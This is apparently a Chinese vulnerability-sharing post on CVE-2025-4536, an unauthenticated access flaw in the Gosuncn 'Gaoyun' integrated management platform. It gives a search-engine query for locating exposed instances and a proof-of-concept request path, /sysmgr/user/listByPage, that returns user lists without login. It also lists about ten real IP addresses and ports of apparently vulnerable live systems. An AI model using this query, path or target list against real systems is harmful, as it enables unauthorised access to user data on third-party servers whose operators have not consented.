(CVE-2025-4536)【原创】高新兴科技集团股份有限公司高云综合管理平台 V1.0 未授权访问漏洞


当前为私密分享,无需登录即可查看。


时间 作者 可见性 等级 Rank
2025-04-26 11:56:09 Sured4rag0n 公开的 中危 0

需申请CVE


厂商信息

高新兴科技集团股份有限公司

null

搜索语法

Hunter

web.title="高云·综合管理平台"

null

FOFA

null

漏洞复现

Poc:

[/sysmgr/user/listByPage

Url+拼接poc直接访问

1、http://124.133.236.211:9998/web/uap-ui/#/login

null

http://124.133.236.211:9998/sysmgr/user/listByPage

null

2、http://223.85.250.189:10013/web/uap-ui/#/login

null

http://223.85.250.189:10013/sysmgr/user/listByPage

null

3、http://60.255.185.166:10013/web/uap-ui/#/login

null

http://60.255.185.166:10013/sysmgr/user/listByPage

null

http://124.133.236.211:9998/sysmgr/user/listByPage

http://223.111.251.20:9998/sysmgr/user/listByPage

http://140.206.131.46:9998/sysmgr/user/listByPage

http://140.206.131.45:9998/sysmgr/user/listByPage

http://36.134.77.52:9998/sysmgr/user/listByPage

http://39.173.10.197:9998/sysmgr/user/listByPage

http://122.141.234.9:10013/sysmgr/user/listByPage


审核评价: 没有任何评价...